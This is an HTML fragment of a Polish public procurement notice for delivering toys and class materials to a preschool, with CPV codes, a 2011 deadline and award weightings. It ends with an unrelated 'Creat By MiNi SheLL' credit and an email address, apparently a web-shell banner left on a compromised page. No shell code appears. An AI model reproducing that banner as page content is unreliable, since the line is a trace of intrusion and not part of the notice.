<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część ta polega na dostawie zabawek do punktu przedszkolnego. Zabawki muszą  spełniać normy bezpieczeństwa, posiadać wymagane instrukcje, atesty i certyfikaty oraz deklaracje zgodności dopuszczające do stosowania. Wymagany przez Zamawiającego okres gwarancji na dostarczone zabawki zgodnie z gwarancją producenta. Wykonawca zapewni bezpłatny serwis w okresie gwarancyjnym. Wykonawca jest zobowiązany na własny koszt usunąć opakowania po dostarczeniu przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50.00</li>
<li>2. Termin realizacji - 35.00</li>
<li>3. Gwarancja - 15.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa materiałów  do zajęć..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część ta polega na dostawie materiałów do zajęć do przedszkola. Zabawki muszą  spełniać normy bezpieczeństwa, posiadać wymagane instrukcje, atesty i certyfikaty oraz deklaracje zgodności dopuszczające do stosowania. Wymagany przez Zamawiającego okres gwarancji na dostarczone zabawki zgodnie z gwarancją producenta. Wykonawca zapewni bezpłatny serwis w okresie gwarancyjnym. Wykonawca jest zobowiązany na własny koszt usunąć opakowania po dostarczeniu przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50.00</li>
<li>2. Termin realizacji - 35.00</li>
<li>3. Gwarancja - 15.00</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com